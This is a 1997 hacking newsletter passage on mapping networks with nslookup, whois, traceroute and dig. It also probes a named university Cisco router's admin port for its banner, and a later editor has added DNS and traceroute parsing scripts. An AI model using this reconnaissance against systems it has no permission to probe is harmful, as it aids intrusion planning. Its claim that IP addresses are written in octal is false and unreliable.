  while (($key,$value)=each %addresses) {
    $host=$key;
    $host=~s/^.*@//;
    $list=$key;
    $list=~s/@.*$//;
#    print "$value\@$host key=\"$key\" list=\"$list\" \n";
    if ($value eq '')
      { $address="listserv\@$host,listproc\@$host,majordomo\@$host"; }
    else { $address="$value\@$host"; }
    print "address=\"$address\"\n";
    print "unsubscribe $list\n";

    if (!$debug) {
      print "Mailing $user\n";
      &unsub ($user, $list, $host, $address);
      &notify ($user, $list, $host, $address);
    }  else {
      print "debug no mail\n";
    }
  }
}
________________________________________
Subscribe to our email list by emailing to hacker@techbroker.com with message "subscribe" or join our Hacker forum at http://www.infowar.com/cgi-shl/login.exe.
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to hacker@techbroker.com.  To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.
________________________________________
 

____________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 Number 2

How to map the Internet. Dig! Whois! Nslookup! Traceroute! Netstat port is getting hard to use anymore, however...
____________________________________________________________

Why map the Internet?

* Because it’s fun -- like exploring unknown continents. The Internet is so huge, and it changes so fast, no one has a complete map.

* Because when you can’t make contact with someone in a distant place, you can help your ISP troubleshoot broken links in the Internet. Yes, I did that once when email to a friend in Northern Ireland failed. How will your ISP know that their communications provider is lying down on the job unless someone advises them of trouble?

* Because if you want to be a computer criminal, your map of the connections to your intended victim gives you valuable information.

Now since this is a lesson on *legal* hacking, we’re not going to help you out with how to determine the best box in which to install a sniffer or how to tell what IP address to spoof to get past a packet filter. We’re just going to explore some of the best tools available for mapping the uncharted realms of the Internet.

For this lesson, you can get some benefit even if all you have is Windows. But to take full advantage of this lesson, you should either have some sort of  Unix on your personal computer, or a shell account! SHELL ACCOUNT! If you don’t have one, you may find an ISP that will give you a shell account at http://www.celestin.com/pocia/.

****************************
Newbie note: A shell account is an account with your ISP that allows you to give commands on a computer running Unix. The “shell” is the program that translates your keystrokes into Unix commands. Trust me, if you are a beginner, you will find bash (for Bourne again shell) to be easiest to use. Ask tech support at your ISP for a shell account set up to use bash. Or, you may be able to get the bash shell by simply typing the word “bash” at the prompt. If your ISP doesn’t offer shell accounts, get a new ISP that does offer it. A great book on using the bash shell is _Learning the Bash Shell_, by Cameron Newham and Bill Rosenblatt, published by O’Reilly.
****************************

So for our mapping expedition, let’s start by visiting the Internet in Botswana! Wow, is Botswana even on the Internet? It’s a lovely landlocked nation in the southern region of Africa, famous for cattle ranching, diamonds and abundant wildlife. The language of commerce in Botswana is English, so there’s a good chance that we could understand messages from their computers.

Our first step in learning about Botswana’s Internet hosts is to use the Unix program nslookup.

****************************
Evil genius tip: Nslookup is one of the most powerful Internet mapping tools in existence. We can hardly do it justice here. If you want to learn how to explore to the max, get the book _DNS and BIND_ by Paul Albitz and Cricket Liu, published by O’Reilly, 1997 edition.
***************************

The first step may be to find where your ISP has hidden the program by using the command “whereis nslookup.” (Or your computer may use the “find” command.) Aha -- there it is! I give the command:

->/usr/etc/nslookup
Default Server:  swcp.com
Address:  198.59.115.2
>

These two lines and the slightly different prompt (it isn’t an arrow any more) tell me that my local ISP is running this program for me. (It is possible to run nslookup on another computer from yours.) Now we are in the program, so I have to remember that my bash commands don’t work any more. Our next step is to tell the program that we would like to know what computers handle any given domain name.

> set type=ns

Next we need to know the domain name for Botswana. To do that I look up the list of top level domain names on page 379 of the 1997 edition of _DNS and BIND_. For Botswana it’s bw. So I enter it at the prompt, remembering -- this is VERY important -- to put a period after the domain name:

> bw.
Server:  swcp.com
Address:  198.59.115.2

Non-authoritative answer:

This “non-authoritative answer” stuff tells me that this information has been stored for a while, so it is possible, but unlikely, that the information below has changed.

bw      nameserver = DAISY.EE.UND.AC.ZA
bw      nameserver = RAIN.PSG.COM
bw      nameserver = NS.UU.NET
bw      nameserver = HIPPO.RU.AC.ZA
Authoritative answers can be found from:
DAISY.EE.UND.AC.ZA      inet address = 146.230.192.18
RAIN.PSG.COM    inet address = 147.28.0.34
NS.UU.NET       inet address = 137.39.1.3
HIPPO.RU.AC.ZA  inet address = 146.231.128.1

I look up the domain name “za” and discover it stands for South Africa. This tells me that the Internet is in its infancy in Botswana -- no nameservers there --  but must be well along in South Africa. Look at all those nameservers!

***********************
Newbie note: a nameserver is a computer program that stores data on the Domain Name System. The Domain Name System makes sure that no two computers have the same name. It also stores information on how to find other computers. When various nameservers get to talking with each other, they eventually, usually within seconds, can figure out the routes to any one of the millions of computers on the Internet.
***********************

Well, what this tells me is that people who want to set up Internet host computers in Botswana usually rely on computers in South Africa to connect them. Let’s learn more about South Africa. Since we are still in the nslookup program, I command it to tell me what computers are nameservers for South Africa:

> za.
Server:  swcp.com
Address:  198.59.115.2

Non-authoritative answer:
za      nameserver = DAISY.EE.UND.AC.za
za      nameserver = UCTHPX.UCT.AC.za
za      nameserver = HIPPO.RU.AC.za
za      nameserver = RAIN.PSG.COM
za      nameserver = MUNNARI.OZ.AU
za      nameserver = NS.EU.NET
za      nameserver = NS.UU.NET
za      nameserver = UUCP-GW-1.PA.DEC.COM
za      nameserver = APIES.FRD.AC.za
Authoritative answers can be found from:
DAISY.EE.UND.AC.za      inet address = 146.230.192.18
UCTHPX.UCT.AC.za        inet address = 137.158.128.1
HIPPO.RU.AC.za  inet address = 146.231.128.1
RAIN.PSG.COM    inet address = 147.28.0.34
MUNNARI.OZ.AU   inet address = 128.250.22.2
MUNNARI.OZ.AU   inet address = 128.250.1.21
NS.EU.NET       inet address = 192.16.202.11
UUCP-GW-1.PA.DEC.COM    inet address = 204.123.2.18
UUCP-GW-1.PA.DEC.COM    inet address = 16.1.0.18
APIES.FRD.AC.za inet address = 137.214.80.1

***********************
Newbie note: What is inet address = 137.214.80.1 supposed to mean? That’s the name of a computer on the Internet (inet) -- in this case APIES.FRD.AC -- in octal. Octal is like regular numbers except in base 8 rather than base 10. All computer names on the Internet must be changed into numbers so that other computers can understand them.
**********************

Aha! Some of those nameservers are located outside South Africa. We see computers in Australia (au) and the US (com domain). Next, we exit the nslookup program with the command ^D. That’s made by holding down the control key while hitting the small “d” key. It is VERY IMPORTANT to exit nslookup this way and not with ^C.
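What nslookup is doing behind those prompts is sending a DNS query packet and reading the reply. The following Python script is an added example, not part of the original guide: it builds an NS query for “bw.” by hand (same trailing period, same meaning), parses a reply, and reads the AA flag whose absence nslookup reports as a “non-authoritative answer.” The reply parsed here is constructed inline, modelled on the RAIN.PSG.COM answer above; the transaction id 0x1234 and the send_query() helper are assumptions, and send_query() only makes sense against a resolver you are entitled to use.

```python
import socket
import struct

TYPE_A, TYPE_NS = 1, 2
FLAG_AA = 0x0400   # "authoritative answer"; clear on a cached reply, which nslookup prints as non-authoritative

def encode_name(name):
    """Encode "bw." as length-prefixed labels (b"\\x02bw\\x00"); the trailing dot marks the root."""
    out = b""
    for label in name.rstrip(".").split("."):
        if label:
            out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"

def build_query(name, qtype, txid=0x1234):
    """12-byte header (id, RD flag set, one question) followed by the question section."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)

def decode_name(msg, offset):
    """Read a possibly compressed name; return (name, offset just past it in the stream)."""
    labels, end, jumped = [], offset, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                       # pointer to an earlier copy of the name
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        if length == 0:
            if not jumped:
                end = offset + 1
            break
        offset += 1
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels) + ".", end

def parse_response(msg):
    """Return (authoritative?, [(owner, type, ttl, value), ...]) for every record in the reply."""
    _, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qd):                                 # skip the echoed question
        _, offset = decode_name(msg, offset)
        offset += 4
    records = []
    for _ in range(an + ns + ar):
        owner, offset = decode_name(msg, offset)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        if rtype == TYPE_NS:
            value, _ = decode_name(msg, offset)
        elif rtype == TYPE_A and rdlen == 4:
            value = ".".join(str(b) for b in msg[offset:offset + 4])
        else:
            value = msg[offset:offset + rdlen].hex()
        offset += rdlen
        records.append((owner, {TYPE_A: "A", TYPE_NS: "NS"}.get(rtype, str(rtype)), ttl, value))
    return bool(flags & FLAG_AA), records

def build_sample_response(query):
    """Constructed reply: bw. NS rain.psg.com. plus a glue A record, with AA clear (cached answer)."""
    header = query[:2] + struct.pack("!HHHHH", 0x8180, 1, 1, 0, 1)   # QR, RD, RA set; AA clear
    question = query[12:]
    ns_rdata = encode_name("rain.psg.com.")
    answer = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_NS, 1, 86400, len(ns_rdata)) + ns_rdata
    ns_name_at = 12 + len(question) + 2 + 10            # where rain.psg.com. sits inside the answer
    glue = (struct.pack("!H", 0xC000 | ns_name_at)
            + struct.pack("!HHIH", TYPE_A, 1, 86400, 4) + bytes([147, 28, 0, 34]))
    return header + question + answer + glue

def send_query(server, name, qtype=TYPE_NS, timeout=3.0):
    """Send the query over UDP/53 to a resolver you are allowed to use, and parse what comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, qtype), (server, 53))
        reply, _ = s.recvfrom(4096)
    return parse_response(reply)

if __name__ == "__main__":
    auth, recs = parse_response(build_sample_response(build_query("bw.", TYPE_NS)))
    print("authoritative" if auth else "non-authoritative")
    for rec in recs:
        print(rec)
```

Run stand-alone it decodes the constructed reply; point send_query() at your own resolver to see the real NS set for a zone and whether that resolver answered from cache.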

Next, we take one of the nameservers in South Africa and ask:

->whois HIPPO.RU.AC.ZA
[No name] (HIPPO)

   Hostname: HIPPO.RU.AC.ZA
   Address: 146.231.128.1
   System: SUN running SUNOS

   Domain Server

   Record last updated on 24-Feb-92.

   To see this host record with registered users, repeat the command with  a star ('*') before the name; or, use '%' to show JUST the registered users.

   The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's).
   Please use the whois server at nic.ddn.mil for MILNET Information.

Kewl! This tells us what kind of computer it is -- a Sun -- and the operating system, Sun OS.

Now, just for variety, I use the whois command with the numerical address of one of the nameservers. This doesn’t always give back the text name, but sometimes it works. And, voila, we get:

->whois 146.230.192.18
[No name] (DAISY1)

   Hostname: DAISY.EE.UND.AC.ZA
   Address: 146.230.192.18
   System: HP-9000 running HP-UX

   Domain Server

   Record last updated on 14-Sep-94.

Ah, but all this is doing so far is just telling us info about who is a nameserver for whom. Now how about directly mapping a route from my computer to South Africa? For that we will use the traceroute command.

************************
Netiquette tip: The traceroute program is intended for use in network testing, measurement and management. It should be used primarily for manual fault isolation, like the time I couldn’t email my friend in Northern Ireland. Because of the load it could impose on the network, it is unwise to use traceroute from automated scripts which could cause that program to send out huge numbers of queries. Use it too much and your ISP may start asking you some sharp questions.
************************

************************
YOU COULD GO TO JAIL WARNING: If you just got an idea of how to use traceroute for a denial of service attack, don’t call your favorite journalist and tell him or her that you are plotting a denial of service attack against the ISPs that serve famous people like Bill Clinton and Carolyn Meinel!:-) Don’t write that script. Don’t use it. If you do, I’ll give another interview to PC World magazine (http://www.pcworld.com/news/newsradio/meinel/index.html) about how a three-year-old could run the attack. And if you get caught we’ll all laugh at you as you get hustled off in chains while your journalist friend gets a $250K advance on his or her book deal about you.
************************

I give the command:

->whereis traceroute
traceroute: /usr/local/bin/traceroute

OK, now we’re ready to map in earnest. I give the command:

->/usr/local/bin/traceroute DAISY.EE.UND.AC.ZA

And the answer is:

traceroute to DAISY.EE.UND.AC.ZA (146.230.192.18), 30 hops max, 40 byte packets
 1  sisko (198.59.115.1)  3 ms  4 ms  4 ms
 2  glory-cyberport.nm.westnet.net (204.134.78.33)  47 ms  8 ms  4 ms
 3  ENSS365.NM.ORG (129.121.1.3)  5 ms  10 ms  7 ms
 4  h4-0.cnss116.Albuquerque.t3.ans.net (192.103.74.45)  17 ms  41 ms  28 ms
 5  f2.t112-0.Albuquerque.t3.ans.net (140.222.112.221)  7 ms  6 ms  5 ms
 6  h14.t16-0.Los-Angeles.t3.ans.net (140.223.17.9)  31 ms  39 ms  84 ms
 7  h14.t8-0.San-Francisco.t3.ans.net (140.223.9.13)  67 ms  43 ms  68 ms
 8  enss220.t3.ans.net (140.223.9.22)  73 ms  58 ms  54 ms
 9  sl-mae-w-F0/0.sprintlink.net (198.32.136.11)  97 ms  319 ms  110 ms
10  sl-stk-1-H11/0-T3.sprintlink.net (144.228.10.109)  313 ms  479 ms  473 ms
11  sl-stk-2-F/T.sprintlink.net (198.67.6.2)  179 ms * *
12  sl-dc-7-H4/0-T3.sprintlink.net (144.228.10.106)  164 ms *  176 ms
13  sl-dc-7-F/T.sprintlink.net (198.67.0.1)  143 ms  129 ms  134 ms
14  gsl-dc-3-Fddi0/0.gsl.net (204.59.144.197)  135 ms  152 ms  130 ms
15  204.59.225.66 (204.59.225.66)  583 ms  545 ms  565 ms
16  * * *
17  e0.csir00.uni.net.za (155.232.249.1)  516 ms  436 ms  400 ms
18  s1.und00.uni.net.za (155.232.70.1)  424 ms  485 ms  492 ms
19  e0.und01.uni.net.za (155.232.190.2)  509 ms  530 ms  459 ms
20  s0.und02.uni.net.za (155.232.82.2)  650 ms *  548 ms
21  Gw-Uninet1.CC.und.ac.za (146.230.196.1)  881 ms  517 ms  478 ms
22  cisco-unp.und.ac.za (146.230.128.8)  498 ms  545 ms *
23  IN.ee.und.ac.za (146.230.192.18)  573 ms  585 ms  493 ms

So what does all this stuff mean?

The number in front of each line is the number of hops since leaving the computer that has the shell account I am using.

The second entry is the name of the computer through which this route passes, first in text, and then in parentheses its numerical representation.

The numbers after that are the time in milliseconds it takes for each of three probe packets in a row to make that hop. When an * appears, the time for the hop timed out. In the case of this traceroute command, any time greater than 3 seconds causes an * to be printed out.

How about hop 16? It gave us no info whatsoever. That silent gateway may be the result of a bug in the 4.1, 4.2 or 4.3BSD Unix network code. A computer running one of these operating systems sends an “unreachable” message. Or it could be something else. Sorry, I’m not enough of a genius yet to figure out this one for sure. Are we having phun yet?
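Reading a long trace by eye is how you spot hop 16, but when you are handing evidence to your ISP it helps to have the facts pulled out mechanically. This Python parser is an added example, not from the original guide. It reads output in the format shown above (the sample inside it is constructed from a handful of hops copied from that trace), and reports hops that answered nothing, hops that dropped some probes, and the hop where the best round-trip time jumps the most, which is usually the link to look at first. The 200 ms jump threshold is an arbitrary assumption.

```python
import re

# Constructed sample: the header plus a few hops copied from the trace above.
SAMPLE_TRACEROUTE = """\
traceroute to DAISY.EE.UND.AC.ZA (146.230.192.18), 30 hops max, 40 byte packets
 1  sisko (198.59.115.1)  3 ms  4 ms  4 ms
11  sl-stk-2-F/T.sprintlink.net (198.67.6.2)  179 ms * *
15  204.59.225.66 (204.59.225.66)  583 ms  545 ms  565 ms
16  * * *
23  IN.ee.und.ac.za (146.230.192.18)  573 ms  585 ms  493 ms
"""

HOP_RE = re.compile(r"^\s*(\d+)\s+(.*)$")
HOST_RE = re.compile(r"^(\S+)\s+\((\d+\.\d+\.\d+\.\d+)\)\s*(.*)$")
PROBE_RE = re.compile(r"\*|\d+(?:\.\d+)?\s*ms")

def parse_hop(line):
    """One hop line -> dict, or None when the line is not a hop (for example the header)."""
    m = HOP_RE.match(line)
    if not m:
        return None
    number, rest = int(m.group(1)), m.group(2).strip()
    host = ip = None
    hm = HOST_RE.match(rest)
    if hm:                                   # a silent hop (* * *) has no name or address
        host, ip, rest = hm.group(1), hm.group(2), hm.group(3)
    rtts = [None if tok == "*" else float(tok.rstrip("ms").strip()) for tok in PROBE_RE.findall(rest)]
    return {"hop": number, "host": host, "ip": ip, "rtts": rtts}

def parse_traceroute(text):
    return [h for h in (parse_hop(line) for line in text.splitlines()) if h]

def min_rtt(hop):
    """Best of the three probes, or None if every probe timed out."""
    answered = [r for r in hop["rtts"] if r is not None]
    return min(answered) if answered else None

def silent_hops(hops):
    """Hops printed as * * *: nothing came back within the timeout."""
    return [h["hop"] for h in hops if min_rtt(h) is None]

def lossy_hops(hops):
    """Hops that answered some probes but dropped others."""
    return [h["hop"] for h in hops if min_rtt(h) is not None and None in h["rtts"]]

def latency_jumps(hops, threshold_ms=200.0):
    """Hops whose best RTT rises by more than threshold_ms over the previous answering hop."""
    flagged, prev = [], None
    for h in hops:
        cur = min_rtt(h)
        if cur is None:
            continue
        if prev is not None and cur - prev > threshold_ms:
            flagged.append(h["hop"])
        prev = cur
    return flagged

if __name__ == "__main__":
    hops = parse_traceroute(SAMPLE_TRACEROUTE)
    print("silent:", silent_hops(hops), "lossy:", lossy_hops(hops), "jumps:", latency_jumps(hops))
```

On the sample it reports hop 16 as silent, hop 11 as lossy, and hop 15 as the jump, which is exactly where the trace above leaves North America.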

************************
Evil genius tip: If you want to get really, truly excruciating detail on the traceroute command, while in your shell account type in the command:

->man traceroute

I promise, on-line manual stuff is often written in a witty, entertaining fashion. Especially the Sun OS manual. Honest!
************************

************************
Note for the shell-account-challenged: If you have Windows 95, you can get the same results -- I mean, for mapping the Internet, not going to jail -- using the “tracert” command. Here’s how it works:

1. Open a PPP connection. For example, if you use Compuserve or AOL, make a connection, then minimize your on-line access program.
2. Click on the Start menu.
3. Open a DOS window.
4. At the DOS prompt type in “tracert <distant.computer.com>” where “distant.computer.com” is replaced by the name of the computer to which you want to trace a route. Press the Enter key.
5. Be patient. Especially if you are tracing a route to a distant computer, it takes a while to make all the connections. Every time your computer connects to another computer on the Internet, it first has to trace a route to the other computer. That’s why it sometimes takes a long while for your browser to start downloading a Web page.
6. If you decide to use Windows for this hacking lesson, Damien Sorder has a message for us: “DON'T ENCOURAGE THEM TO USE WIN95!@#$!@#!” He’s right, but since most of you reading this are consenting adults, I figure it’s your funeral if you stoop to Windows hacking on an AOL PPP connection!
***********************

Now this is getting interesting. We know that Daisy is directly connected to at least one other computer, and that computer in turn is connected to cisco-unp.und.ac.za. Let’s learn a little something about this cisco-unp.und.ac.za, OK?

First, we can guess from the name that it is a Cisco router. In fact, the first hop in this route is to a computer named “sisko,” which is also probably a Cisco router. Since 85% of the routers in the world are Ciscos, that’s a pretty safe bet. But we are not only going to make sure cisco-unp.und.ac.za is a Cisco. We are also going to find out the model number, and a few other goodies.

First we try out whois:

->whois cisco-unp.und.ac.za
No match for "CISCO-UNP.UND.AC.ZA".

The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.

Huh? Traceroute tells us cisco-unp.und.ac.za exists, but whois can’t find it! Actually this is a common problem, especially trying to use whois on distant computers. What do we do next? Well, if you are lucky, the whereis command will turn up another incredibly cool program: dig!

**********************
Newbie note: Dig stands for “domain information groper.” It does a lot of the same things as nslookup. But dig is a much older program, in many ways harder to use than nslookup. For details on dig, use the command from your shell account “man dig.”
**********************

In fact, on my shell account I found I could run dig straight from my bash prompt:

->dig CISCO-UNP.UND.AC.ZA

; <<>> DiG 2.0 <<>> CISCO-UNP.UND.AC.ZA
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr aa rd ra; Ques: 1, Ans: 4, Auth: 5, Addit: 5
;; QUESTIONS:
;;      CISCO-UNP.UND.AC.ZA, type = A, class = IN

;; ANSWERS:
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.248.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.12.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.60.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.128.8

;; AUTHORITY RECORDS:
und.ac.za.      86400   NS      Eagle.und.ac.za.
und.ac.za.      86400   NS      Shrike.und.ac.za.
und.ac.za.      86400   NS      ucthpx.uct.ac.za.
und.ac.za.      86400   NS      hiPPo.ru.ac.za.
und.ac.za.      86400   NS      Rain.psg.com.

;; ADDITIONAL RECORDS:
Eagle.und.ac.za.        86400   A       146.230.128.15
Shrike.und.ac.za.       86400   A       146.230.128.13
ucthpx.uct.ac.za.       86400   A       137.158.128.1
hiPPo.ru.ac.za. 86400   A       146.231.128.1
Rain.psg.com.   14400   A       147.28.0.34

;; Total query time: 516 msec
;; FROM: llama to SERVER: default -- 198.59.115.2
;; WHEN: Fri Jan 17 13:03:49 1997
;; MSG SIZE  sent: 37  rcvd: 305

Ahhh, nice. The first few lines, the ones preceded by the ;; marks, mostly tell what the default settings of the command are and what we asked it. The line “Ques: 1, Ans: 4, Auth: 5, Addit: 5” tells us how many items we’ll get under each topic of questions, answers, authority records, and additional records.  (You will get different numbers on that line with different queries.) This “records” stuff refers to information stored under the domain name system.

We learn from dig that CLASS=IN, meaning CISCO-UNP.UND.AC.ZA is a domain name within the Internet. But we already knew that. The first really *new* thing we learn is that four routers all share the same domain name. We can tell that because their numerical Internet addresses are different. The reverse can also happen: several domain names can all belong to the same numerical address. If you use the dig command on each link in the route to DAISY.EE.UND.AC.ZA, you’ll find a tremendous variation in whether the routers map to the same or different domain names. As hackers, we want to get wise to all these variations in how domain names are associated with boxes.
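The “one name, several addresses” observation is easy to make by hand on one dig listing and tedious on twenty. This added Python example (not the guide’s own code) parses dig 2.0-style output such as the listing above, using a constructed sample trimmed from it, and builds the forward map (name to addresses), the reverse map (address to names) and the list of multi-homed names. It assumes record lines are whitespace-separated as `owner TTL TYPE rdata`, which holds for the output shown; owner names are lowercased because DNS names are case-insensitive (note the hiPPo capitalisation above).

```python
import re
from collections import defaultdict

# Constructed sample: trimmed from the dig listing above (two authority/additional records kept).
SAMPLE_DIG = """\
; <<>> DiG 2.0 <<>> CISCO-UNP.UND.AC.ZA
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr aa rd ra; Ques: 1, Ans: 4, Auth: 2, Addit: 2
;; QUESTIONS:
;;      CISCO-UNP.UND.AC.ZA, type = A, class = IN

;; ANSWERS:
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.248.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.12.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.60.1
CISCO-UNP.UND.AC.ZA.    86400   A       146.230.128.8

;; AUTHORITY RECORDS:
und.ac.za.      86400   NS      Eagle.und.ac.za.
und.ac.za.      86400   NS      Rain.psg.com.

;; ADDITIONAL RECORDS:
Eagle.und.ac.za.        86400   A       146.230.128.15
Rain.psg.com.   14400   A       147.28.0.34
"""

SECTIONS = {"ANSWERS:": "answers", "AUTHORITY RECORDS:": "authority", "ADDITIONAL RECORDS:": "additional"}

def parse_dig(text):
    """Split a dig listing into status, header flags and the three record sections."""
    result = {"status": None, "flags": set(), "answers": [], "authority": [], "additional": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";;"):
            body = line[2:].strip()
            if body.startswith("->>HEADER<<-"):
                m = re.search(r"status: (\w+)", body)
                result["status"] = m.group(1) if m else None
            elif body.startswith("flags:"):          # "qr aa rd ra": aa means an authoritative answer
                result["flags"] = set(body.split(";")[0][len("flags:"):].split())
            else:
                section = SECTIONS.get(body)        # QUESTIONS: and the footer lines reset to None
            continue
        if line.startswith(";") or section is None:
            continue
        owner, ttl, rtype, rdata = line.split(None, 3)
        result[section].append((owner.lower(), int(ttl), rtype, rdata.strip()))
    return result

def forward_map(records):
    """name -> list of addresses, from A records only."""
    fm = defaultdict(list)
    for owner, _, rtype, rdata in records:
        if rtype == "A":
            fm[owner].append(rdata)
    return dict(fm)

def reverse_map(records):
    """address -> sorted list of names that resolve to it."""
    rm = defaultdict(set)
    for owner, _, rtype, rdata in records:
        if rtype == "A":
            rm[rdata].add(owner)
    return {ip: sorted(names) for ip, names in rm.items()}

def multihomed(records):
    """Names with more than one address, such as a router answering on each of its interfaces."""
    return sorted(name for name, addrs in forward_map(records).items() if len(addrs) > 1)

if __name__ == "__main__":
    d = parse_dig(SAMPLE_DIG)
    print(d["status"], sorted(d["flags"]))
    print("multi-homed:", multihomed(d["answers"] + d["additional"]))
```

Feed it the dig output for each hop of a trace and the variation the paragraph above talks about falls out of multihomed() and reverse_map() directly.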

But we can still learn even more about that Cisco router named CISCO-UNP.UND.AC.ZA. We go back to nslookup and run it in interactive mode:

->/usr/etc/nslookup
Default Server:  swcp.com
Address:  198.59.115.2
>

Now let’s do something new with nslookup. This is a command that comes in really, really handy when we’re playing vigilante and need to persecute a spammer or bust a child porn Web site or two.  Here’s how we can get the email address for the sysadmin of an Internet host computer.

> set type=soa

Then I enter the name of the computer about which I am curious. Note that I put a period after the end of the host name. It often helps to do this with nslookup:

> CISCO-UNP.UND.AC.ZA.
Server:  swcp.com
Address:  198.59.115.2

*** No start of authority zone information is available for CISCO-UNP.UND.AC.ZA.

Now what do I do? Give up? No, I’m a hacker wannabe, right? So I try entering just part of the domain name, again remembering to put a period at the end:

> und.ac.za.
Server:  swcp.com
Address:  198.59.115.2
und.ac.za       origin = Eagle.und.ac.za
        mail addr = postmaster.und.ac.za
        serial=199610255, refresh=10800, retry=3600, expire=3000000, min=86400
Eagle.und.ac.za inet address = 146.230.128.15
Shrike.und.ac.za        inet address = 146.230.128.13
ucthpx.uct.ac.za        inet address = 137.158.128.1
hiPPo.ru.ac.za  inet address = 146.231.128.1
Rain.psg.com    inet address = 147.28.0.34

Bingo!!! I got the email address of a sysadmin whose domain includes that Cisco router, AND the IP addresses of some other boxes he or she administers. But notice it doesn’t list any of those routers which the sysadmin undoubtedly knows a thing or two about.
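The “mail addr” line is not quite an email address: DNS stores the responsible mailbox as a domain name, and the first unescaped dot stands in for the @. This added Python example (not from the guide) turns the SOA record above into something a sysadmin can act on. It converts postmaster.und.ac.za to postmaster@und.ac.za, expresses the timers in human units, and applies the sanity checks commonly recommended for SOA records (retry shorter than refresh, expire longer than both, serial in the YYYYMMDDnn date form that RFC 1912 advises). The sample text is copied from the nslookup output above; the escaped-dot example john\.doe.example.com is constructed.

```python
import re

# Copied from the nslookup SOA output above.
SAMPLE_SOA = """\
und.ac.za       origin = Eagle.und.ac.za
        mail addr = postmaster.und.ac.za
        serial=199610255, refresh=10800, retry=3600, expire=3000000, min=86400
"""

def rname_to_email(rname):
    """The SOA RNAME is a domain name; its first unescaped dot stands for '@'.
    An escaped dot (\\.) belongs to the local part: john\\.doe.example.com is john.doe@example.com."""
    local, i = [], 0
    while i < len(rname):
        c = rname[i]
        if c == "\\" and i + 1 < len(rname):
            local.append(rname[i + 1])
            i += 2
            continue
        if c == ".":
            return "".join(local) + "@" + rname[i + 1:].rstrip(".")
        local.append(c)
        i += 1
    return "".join(local)

def parse_soa(text):
    """Pull the SOA fields out of nslookup's 'set type=soa' listing."""
    soa = {}
    soa["primary"] = re.search(r"origin = (\S+)", text).group(1)
    soa["contact"] = rname_to_email(re.search(r"mail addr = (\S+)", text).group(1))
    for key in ("serial", "refresh", "retry", "expire", "min"):
        soa[key] = int(re.search(r"\b%s=(\d+)" % key, text).group(1))
    return soa

def describe_timers(soa):
    """The timers in the units an administrator thinks in."""
    return {
        "refresh_hours": soa["refresh"] / 3600,          # how often secondaries check the serial
        "retry_hours": soa["retry"] / 3600,              # how soon they retry after a failed check
        "expire_days": round(soa["expire"] / 86400, 2),  # how long they keep serving without contact
        "min_ttl_hours": soa["min"] / 3600,              # default / negative-caching TTL
    }

def soa_sanity(soa):
    """Warnings for values that will make secondaries misbehave or make serial bumps ambiguous."""
    warnings = []
    if soa["retry"] >= soa["refresh"]:
        warnings.append("retry should be shorter than refresh")
    if soa["expire"] <= soa["refresh"] + soa["retry"]:
        warnings.append("expire should exceed refresh plus retry")
    if not re.fullmatch(r"(19|20)\d{2}(0[1-9]|1[0-2])(0[1-9]|[12]\d|3[01])\d{2}", str(soa["serial"])):
        warnings.append("serial %d is not in the YYYYMMDDnn date convention" % soa["serial"])
    return warnings

if __name__ == "__main__":
    soa = parse_soa(SAMPLE_SOA)
    print(soa["contact"], describe_timers(soa), soa_sanity(soa))
```

On the record above the only warning is about the serial, which has nine digits rather than the ten of a YYYYMMDDnn serial.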

But we aren’t done yet with cisco-unp.und.ac.za (146.230.128.8). Of course we have a pretty good guess that it is a Cisco router. But why stop with a mere guess when we can port surf? So we fall back on our friend the telnet program and head for port 2001:

->telnet 146.230.128.8 2001
Trying 146.230.128.8 ...
Connected to 146.230.128.8.
Escape character is '^]'.
C
*************************************************************************
***  Welcome to the University of Natal                               ***
***                                                                   ***
*** Model : Cisco 4500 with ATM and 8 BRI ports                       ***
***                                                                   ***
*** Dimension Data Durban - 031-838333                                ***
***                                                                   ***
*************************************************************************

Hey, we know now that this is a Cisco model 4500 owned by the University of Natal, and we even got a phone number for the sysadmin. From this we also can infer that this router handles a subnet which serves the U of Natal and includes daisy.

But why did I telnet to port 2001? It’s in common use among routers as the administrative port. How do I know that? From the RFC (request for comments) that covers all commonly used port assignments. You can find a copy of this RFC at http://www.internic.net/help/domain/rfc1739.txt. Read it and you’ll be in for some happy port surfing!

************************
Evil Genius tip: there are a bunch of ports used by Cisco routers:
cisco-fna       130/tcp    cisco FNATIVE
cisco-tna       131/tcp    cisco TNATIVE
cisco-sys       132/tcp    cisco SYSMAINT
licensedaemon   1986/tcp   cisco license management
tr-rsrb-p1      1987/tcp   cisco RSRB Priority 1 port
